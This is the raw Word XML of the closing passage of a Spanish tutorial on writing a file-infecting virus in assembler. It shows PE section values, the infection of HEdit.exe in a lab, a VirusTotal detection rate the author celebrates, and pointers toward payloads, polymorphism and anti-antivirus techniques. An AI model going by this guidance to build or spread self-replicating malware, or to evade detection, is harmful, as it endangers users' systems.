        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="42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Win32  Version Value</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7A65726F (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:i/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>zero</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="432"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Size Of Image</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304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4000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="435" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="847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620" w:leader="none"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:b/>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Sección .data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="44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Physical Address</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4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6FD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="443"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Virtual Size</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4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6FD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="44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Size Of RawData</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2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A00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="45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Characteristics</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C00004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rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>E000060</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Que es justamente lo que hemos estado realizando a través de este tutori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odemos probar con otros ejecutables más complejos, por ejemplo con el editor hexadecimal que utilizamos en el capítulo 4 (HEdit.exe), lo colocamos dentro del laboratorio, lo infectamos y luego nos traemos los archivos de prueba limpios (asm001, asm002, etc.).</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Ahora ejecutamos nuestro HEdit.exe infectado, y vemos por un lado que se ejecuta normalmente y además si observamos en el directorio vemos que infectó tres archivos, igual que nuestras pruebas anterior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538220" cy="1965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14" r="-8" b="-14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3538220" cy="196532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Queda en ustedes seguir probándolo, incluso pueden cargar el programa HEdit.exe infectado con el Olly y seguir su ejecución desde allí. Prueben, prueben y prueben, y mejoren el código que esa es le mejor forma de aprende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También podemos subirlo a VirusTotal (</w:t>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>https://www.virustotal.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>), que es un página que ofrece un servicio de multiescaneo de archivos online. En mi caso dio el siguiente result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5241925" cy="2708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4" t="-8" r="-4" b="-8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5241925" cy="27082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a verdad es que es bastante bueno, ya que este virus dista mucho de ser algo decente y además tiene rutinas muy evidentes que lo delatan. Así y todo sólo lo detectaron 20 de 42 antivirus. Bien por él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Eso es todo, llegamos al final de esta introducción a la programación de virus en Assembler. Si quieren seguir avanzando en este maravilloso mundo, el camino es largo, pero apasionante. Pueden empezar por mejorar este virus o empezar uno de cero, cambiar las rutinas, tanto el cálculo del delta offset, la búsqueda de APIs, la búsqueda del kernel32 (puede ser por ejemplo utilizando el PEB), o agregar un payload, etc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="-3261" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="-3261" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>También pueden ver código de otras personas para seguir aprendiendo o ver técnicas avanzadas, como hooking, antidebugguing, polimorfismo, técnicas anti-antivirus, packing, encriptación, ofuscación, Entry Point Obscuring y un largo, largo etcéter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ueno, antes de terminar quiero agradecer atodos los que leyeron esta guía, a todos los que escriben y comparten lo que saben para que yo pudiera hacer esto posible, y en general a todos los que escriben de estos temas con el único interés de aprender y de ayudar a difundir el conocimient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specialmente quiero agradecer a la gente de la lista Sector Virus (http://groups.google.com.ar/group/sector-virus) y de CracksLatinoS (https://groups.google.com/group/crackslatinos) quienes siempre me brindaron su apoyo y compartieron todo conmig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Gracias a todos, y lean, prueben, aprendan y sobre todo, sean responsables. Los dejo con una frase que para mi resume to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b/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">"Viruses don't harm, ignorance does!"  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i/>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>("Los virus no hacen daño, la ignorancia lo hace")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i/>
          <w:i/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:i/>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zeroPad ::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Junio 2012</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:vanish/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:vanish/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_PictureBullets"/>
      <w:bookmarkStart w:id="1" w:name="_PictureBullets"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId17"/>
      <w:footerReference w:type="default" r:id="rId18"/>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14</w:t>
    </w:r>
  </w:p>
</w:hdr>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s://www.virustotal.com/" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.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docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Normal.dotm</Template>
  <TotalTime>5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
  <dc:description/>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-06-25T02:53:00Z</dcterms:modified>
  <cp:revision>2906</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>